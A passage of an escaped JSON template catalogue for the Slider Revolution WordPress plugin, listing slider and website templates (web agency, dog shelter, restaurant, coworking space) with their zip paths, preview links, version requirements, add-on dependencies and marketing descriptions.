and attract customers with a taste of urban dining excellence.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2024-04-05 14:43:14\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"734\":{\"id\":\"777\",\"title\":\"Modern Web Agency Website Template Package\",\"alias\":\"modern-web-agency-website-template-package\",\"zip\":\"\",\"uid\":\"modern-web-agency-website-template-package\",\"img\":\"packages\\/Modern-Web-Agency-Website-Template.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/modern-web-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=modern-web-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.7.0\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">Modern Web Agency Website Template is a one-page website template designed for contemporary web agencies seeking a blend of elegance and functionality. This minimalist yet sophisticated template features a dynamic full-screen hero section, interactive elements, and smooth scrolling navigation, ensuring a captivating user experience. Responsive and SEO-optimized, it adapts beautifully across devices while enhancing your online visibility. Ideal for showcasing services and projects, it combines ease of customization with fast loading times, making it a perfect choice for agencies looking to leave a lasting impression in the digital world.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-fluiddynamics-addon\\\\\\/revslider-fluiddynamics-addon.php\\\",\\\"name\\\":\\\"Fluid Dynamics AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2024-04-05 14:46:51\",\"package\":\"Modern Web Agency Website Template Package\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"66\",\"installed\":false},\"735\":{\"id\":\"778\",\"title\":\"Modern Web Agency Hero\",\"alias\":\"Modern-Web-Agency-Hero\",\"zip\":\"packs\\/Modern-Web-Agency-Hero.zip\",\"uid\":\"c7c212ffd591dc749821824acfed9b1e\",\"img\":\"Modern-Web-Agency-Hero\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/modern-web-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=modern-web-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.7.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Modern Web Agency Website Template is a one-page website template designed for contemporary web agencies seeking a blend of elegance and functionality. This minimalist yet sophisticated template features a dynamic full-screen hero section, interactive elements, and smooth scrolling navigation, ensuring a captivating user experience. Responsive and SEO-optimized, it adapts beautifully across devices while enhancing your online visibility. Ideal for showcasing services and projects, it combines ease of customization with fast loading times, making it a perfect choice for agencies looking to leave a lasting impression in the digital world.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-fluiddynamics-addon\\\\\\/revslider-fluiddynamics-addon.php\\\",\\\"name\\\":\\\"Fluid Dynamics AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2024-04-05 14:50:46\",\"package\":\"Modern Web Agency Website Template Package\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"66\",\"installed\":false},\"736\":{\"id\":\"779\",\"title\":\"Modern Web Agency Brands\",\"alias\":\"Modern-Web-Agency-Brands\",\"zip\":\"packs\\/Modern-Web-Agency-Brands.zip\",\"uid\":\"1264d8fefc943dbcc791458e6cee7ce8\",\"img\":\"Modern-Web-Agency-Brands\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/modern-web-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=modern-web-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.7.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Modern Web Agency Website Template is a one-page website template designed for contemporary web agencies seeking a blend of elegance and functionality. This minimalist yet sophisticated template features a dynamic full-screen hero section, interactive elements, and smooth scrolling navigation, ensuring a captivating user experience. Responsive and SEO-optimized, it adapts beautifully across devices while enhancing your online visibility. Ideal for showcasing services and projects, it combines ease of customization with fast loading times, making it a perfect choice for agencies looking to leave a lasting impression in the digital world.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2024-04-05 14:53:18\",\"package\":\"Modern Web Agency Website Template Package\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"66\",\"installed\":false},\"737\":{\"id\":\"780\",\"title\":\"Modern Web Agency About\",\"alias\":\"Modern-Web-Agency-About\",\"zip\":\"packs\\/Modern-Web-Agency-About.zip\",\"uid\":\"28af788973472a5b8d1d9f4bc9200667\",\"img\":\"Modern-Web-Agency-About\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/modern-web-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=modern-web-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.7.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Modern Web Agency Website Template is a one-page website template designed for contemporary web agencies seeking a blend of elegance and functionality. This minimalist yet sophisticated template features a dynamic full-screen hero section, interactive elements, and smooth scrolling navigation, ensuring a captivating user experience. Responsive and SEO-optimized, it adapts beautifully across devices while enhancing your online visibility. Ideal for showcasing services and projects, it combines ease of customization with fast loading times, making it a perfect choice for agencies looking to leave a lasting impression in the digital world.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2024-04-05 14:55:45\",\"package\":\"Modern Web Agency Website Template Package\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"66\",\"installed\":false},\"738\":{\"id\":\"781\",\"title\":\"Modern Web Agency Projects\",\"alias\":\"Modern-Web-Agency-Projects\",\"zip\":\"packs\\/Modern-Web-Agency-Projects.zip\",\"uid\":\"ff5c528962fcbff1c39184d538a32a6a\",\"img\":\"Modern-Web-Agency-Projects\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/modern-web-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=modern-web-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.7.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Modern Web Agency Website Template is a one-page website template designed for contemporary web agencies seeking a blend of elegance and functionality. This minimalist yet sophisticated template features a dynamic full-screen hero section, interactive elements, and smooth scrolling navigation, ensuring a captivating user experience. Responsive and SEO-optimized, it adapts beautifully across devices while enhancing your online visibility. Ideal for showcasing services and projects, it combines ease of customization with fast loading times, making it a perfect choice for agencies looking to leave a lasting impression in the digital world.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"carousel\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2024-04-05 14:57:15\",\"package\":\"Modern Web Agency Website Template Package\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"66\",\"installed\":false},\"739\":{\"id\":\"782\",\"title\":\"Modern Web Agency Title Projects\",\"alias\":\"Modern-Web-Agency-Title-Projects\",\"zip\":\"packs\\/Modern-Web-Agency-Title-Projects.zip\",\"uid\":\"ff9fe269ad43f301274963920944b903\",\"img\":\"Modern-Web-Agency-Title-Projects\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/modern-web-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=modern-web-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.7.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Modern Web Agency Website Template is a one-page website template designed for contemporary web agencies seeking a blend of elegance and functionality. This minimalist yet sophisticated template features a dynamic full-screen hero section, interactive elements, and smooth scrolling navigation, ensuring a captivating user experience. Responsive and SEO-optimized, it adapts beautifully across devices while enhancing your online visibility. Ideal for showcasing services and projects, it combines ease of customization with fast loading times, making it a perfect choice for agencies looking to leave a lasting impression in the digital world.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2024-04-05 15:00:22\",\"package\":\"Modern Web Agency Website Template Package\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"66\",\"installed\":false},\"740\":{\"id\":\"783\",\"title\":\"Modern Web Agency Services\",\"alias\":\"Modern-Web-Agency-Services\",\"zip\":\"packs\\/Modern-Web-Agency-Services.zip\",\"uid\":\"f307d3db154e238ca0de95dac9401963\",\"img\":\"Modern-Web-Agency-Services\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/modern-web-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=modern-web-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.7.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Modern Web Agency Website Template is a one-page website template designed for contemporary web agencies seeking a blend of elegance and functionality. This minimalist yet sophisticated template features a dynamic full-screen hero section, interactive elements, and smooth scrolling navigation, ensuring a captivating user experience. Responsive and SEO-optimized, it adapts beautifully across devices while enhancing your online visibility. Ideal for showcasing services and projects, it combines ease of customization with fast loading times, making it a perfect choice for agencies looking to leave a lasting impression in the digital world.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2024-04-05 15:02:05\",\"package\":\"Modern Web Agency Website Template Package\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"66\",\"installed\":false},\"741\":{\"id\":\"784\",\"title\":\"Modern Web Agency Contact\",\"alias\":\"Modern-Web-Agency-Contact\",\"zip\":\"packs\\/Modern-Web-Agency-Contact.zip\",\"uid\":\"ffba037192afa45656e9f4f7bc425b3c\",\"img\":\"Modern-Web-Agency-Contact\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/modern-web-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=modern-web-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.7.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Modern Web Agency Website Template is a one-page website template designed for contemporary web agencies seeking a blend of elegance and functionality. This minimalist yet sophisticated template features a dynamic full-screen hero section, interactive elements, and smooth scrolling navigation, ensuring a captivating user experience. Responsive and SEO-optimized, it adapts beautifully across devices while enhancing your online visibility. Ideal for showcasing services and projects, it combines ease of customization with fast loading times, making it a perfect choice for agencies looking to leave a lasting impression in the digital world.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2024-04-05 15:03:27\",\"package\":\"Modern Web Agency Website Template Package\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"66\",\"installed\":false},\"742\":{\"id\":\"785\",\"title\":\"Modern Agency Project 1\",\"alias\":\"Modern-Agency-Project-1\",\"zip\":\"packs\\/Modern-Agency-Project-1.zip\",\"uid\":\"a894e6ba97e8176be1e66abebcaaf986\",\"img\":\"Modern-Agency-Project-1\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/modern-web-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=modern-web-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.7.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Modern Web Agency Website Template is a one-page website template designed for contemporary web agencies seeking a blend of elegance and functionality. This minimalist yet sophisticated template features a dynamic full-screen hero section, interactive elements, and smooth scrolling navigation, ensuring a captivating user experience. Responsive and SEO-optimized, it adapts beautifully across devices while enhancing your online visibility. Ideal for showcasing services and projects, it combines ease of customization with fast loading times, making it a perfect choice for agencies looking to leave a lasting impression in the digital world.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2024-04-05 15:04:46\",\"package\":\"Modern Web Agency Website Template Package\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"66\",\"installed\":false},\"743\":{\"id\":\"786\",\"title\":\"Modern Agency Project 2\",\"alias\":\"Modern-Agency-Project-2\",\"zip\":\"packs\\/Modern-Agency-Project-2.zip\",\"uid\":\"a6a6f6cdd82579808bbff580261adfdf\",\"img\":\"Modern-Agency-Project-2\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/modern-web-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=modern-web-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.7.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Modern Web Agency Website Template is a one-page website template designed for contemporary web agencies seeking a blend of elegance and functionality. This minimalist yet sophisticated template features a dynamic full-screen hero section, interactive elements, and smooth scrolling navigation, ensuring a captivating user experience. Responsive and SEO-optimized, it adapts beautifully across devices while enhancing your online visibility. Ideal for showcasing services and projects, it combines ease of customization with fast loading times, making it a perfect choice for agencies looking to leave a lasting impression in the digital world.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2024-04-05 15:08:30\",\"package\":\"Modern Web Agency Website Template Package\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"66\",\"installed\":false},\"744\":{\"id\":\"787\",\"title\":\"Modern Agency Project 3\",\"alias\":\"Modern-Agency-Project-3\",\"zip\":\"packs\\/Modern-Agency-Project-3.zip\",\"uid\":\"77b68af53a2d6ed705e8118334144fa8\",\"img\":\"Modern-Agency-Project-3\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/modern-web-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=modern-web-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.7.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Modern Web Agency Website Template is a one-page website template designed for contemporary web agencies seeking a blend of elegance and functionality. This minimalist yet sophisticated template features a dynamic full-screen hero section, interactive elements, and smooth scrolling navigation, ensuring a captivating user experience. Responsive and SEO-optimized, it adapts beautifully across devices while enhancing your online visibility. Ideal for showcasing services and projects, it combines ease of customization with fast loading times, making it a perfect choice for agencies looking to leave a lasting impression in the digital world.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2024-04-05 15:10:19\",\"package\":\"Modern Web Agency Website Template Package\",\"package_order\":\"9\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"66\",\"installed\":false},\"745\":{\"id\":\"788\",\"title\":\"Modern Agency Project 4\",\"alias\":\"Modern-Agency-Project-4\",\"zip\":\"packs\\/Modern-Agency-Project-4.zip\",\"uid\":\"347d38dd2ddf98497ef7a621b0d6ec1f\",\"img\":\"Modern-Agency-Project-4\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/modern-web-agency-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=modern-web-agency-website-template\",\"version\":\"1.0.0\",\"required\":\"6.7.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Modern Web Agency Website Template is a one-page website template designed for contemporary web agencies seeking a blend of elegance and functionality. This minimalist yet sophisticated template features a dynamic full-screen hero section, interactive elements, and smooth scrolling navigation, ensuring a captivating user experience. Responsive and SEO-optimized, it adapts beautifully across devices while enhancing your online visibility. Ideal for showcasing services and projects, it combines ease of customization with fast loading times, making it a perfect choice for agencies looking to leave a lasting impression in the digital world.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2024-04-05 15:11:56\",\"package\":\"Modern Web Agency Website Template Package\",\"package_order\":\"10\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"66\",\"installed\":false},\"746\":{\"id\":\"789\",\"title\":\"Dog Shelter Showcase Slider\",\"alias\":\"Dog-Shelter-Puppy-Showcase-Slider\",\"zip\":\"Dog-Shelter-Showcase-Slider.zip\",\"uid\":\"7c301fa0df88e2a143a3e166c5610ad2\",\"img\":\"Dog-Shelter-Showcase-Slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/dog-shelter-showcase-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=dog-shelter-showcase-slider\",\"version\":\"1.0.0\",\"required\":\"6.7.9\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Discover the \\\"Dog Shelter Showcase Slider,\\\" a captivating slider template crafted for dog shelters aiming to connect puppies with their forever homes. Featuring engaging slides with high-quality images and essential puppy details, this template highlights the unique personalities of each adorable canine. It\'s user-friendly, fully responsive, and designed to inspire potential adopters, making it an essential addition to any dog adoption website. Bring stories to life and help puppies find their families with ease.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-revealer-addon\\\\\\/revslider-revealer-addon.php\\\",\\\"name\\\":\\\"Reveal AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2024-04-30 16:03:57\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"747\":{\"id\":\"790\",\"title\":\"Velocity Elegant Fullscreen Slider\",\"alias\":\"Velocity-Elegant-Fullscreen-Slider\",\"zip\":\"Velocity-Elegant-Fullscreen-Slider.zip\",\"uid\":\"bfaea7a4e5e15981e2ec432b2f6bb0c2\",\"img\":\"Velocity-Elegant-Fullscreen-Slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=revolution.themepunch.com\",\"version\":\"1.0.0\",\"required\":\"6.7.9\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Elevate your website with our Elegant Fullscreen Slider, a visually striking presentation tool designed specifically for showcasing bicycles. This slider captures the essence of both style and functionality, offering fullscreen visuals that bring your cycling products to life. With seamless transitions and a clean design, it is perfect for cycling shops, manufacturers, or any enthusiast looking to highlight their passion for bicycles through a dynamic and engaging online experience<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2024-04-30 16:08:01\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"748\":{\"id\":\"791\",\"title\":\"Professional Training Slider Template\",\"alias\":\"Professional-Training-Slider-Template\",\"zip\":\"Professional-Training-Slider-Template.zip\",\"uid\":\"27bb0e841e8b508883dd4db3d65e342b\",\"img\":\"Professional-Training-Slider-Template\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/professional-training-slider-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=professional-training-slider-template\",\"version\":\"1.0.0\",\"required\":\"6.7.10\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Capture the essence of expertise with this Professional Training Slider Template, designed to showcase educational or training services in a compelling and visually engaging manner. Perfect for institutions, trainers, and educational programs looking to highlight their offerings, this template features sleek design elements and intuitive layouts that guide potential clients through your services. Its versatile structure ensures it can be adapted to various professional settings, enhancing user experience and emphasizing key information effectively.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2024-05-06 14:27:37\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"749\":{\"id\":\"792\",\"title\":\"Modern Restaurant Slider Design\",\"alias\":\"Modern-Restaurant-Slider-Design\",\"zip\":\"Modern-Restaurant-Slider-Design.zip\",\"uid\":\"460679aa4879a6ed62b489fb9198169e\",\"img\":\"Modern-Restaurant-Slider-Design\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/modern-restaurant-slider-design\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=modern-restaurant-slider-design\",\"version\":\"1.0.0\",\"required\":\"6.7.12\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Elevate your restaurants online presence with the Modern Restaurant Slider Design, an exquisite template that seamlessly blends stunning visuals of signature dishes with elegant typography and refined design elements. Ideal for fine dining establishments, bistros, and cafes, this slider is designed to captivate your audience and turn online visitors into loyal patrons.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2024-05-24 11:03:17\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"750\":{\"id\":\"793\",\"title\":\"Coworking Space Website Template\",\"alias\":\"coworking-space-website-template\",\"zip\":\"\",\"uid\":\"coworking-space-website-template\",\"img\":\"packages\\/coworking-space-website-template.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/coworking-space-website-template?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=coworking-space-website-template\",\"version\":\"1.0.0\",\"required\":\"6.7.13\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">Discover the ultimate solution for coworking spaces and shared offices with our modern, clean, and visually captivating website template. Designed to attract remote workers, digital nomads, and professionals, this template features a full-width hero image, detailed descriptions of flexible membership plans, comprehensive amenities, and vibrant community highlights. Testimonials and engaging visuals create a compelling narrative about your space. With a responsive design and intuitive layout, this template ensures a seamless user experience across all devices, making it easier than ever to showcase your coworking spaces unique offerings and vibrant community.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":null,\"date\":\"2024-06-17 16:43:56\",\"package\":\"Coworking Space Website Template Package\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"67\",\"installed\":false,\"new_slider\":true},\"751\":{\"id\":\"794\",\"title\":\"Coworking Space Menu\",\"alias\":\"Coworking-Space-Menu\",\"zip\":\"packs\\/Coworking-Space-Menu.zip\",\"uid\":\"a54d7136ad9469944a75b7a1ac1e9cad\",\"img\":\"Coworking-Space-Menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/coworking-space-website-template?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=coworking-space-website-template\",\"version\":\"1.0.0\",\"required\":\"6.7.13\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Discover the ultimate solution for coworking spaces and shared offices with our modern, clean, and visually captivating website template. Designed to attract remote workers, digital nomads, and professionals, this template features a full-width hero image, detailed descriptions of flexible membership plans, comprehensive amenities, and vibrant community highlights. Testimonials and engaging visuals create a compelling narrative about your space. With a responsive design and intuitive layout, this template ensures a seamless user experience across all devices, making it easier than ever to showcase your coworking spaces unique offerings and vibrant community.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\\r\\n\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2024-06-17 16:46:22\",\"package\":\"Coworking Space Website Template 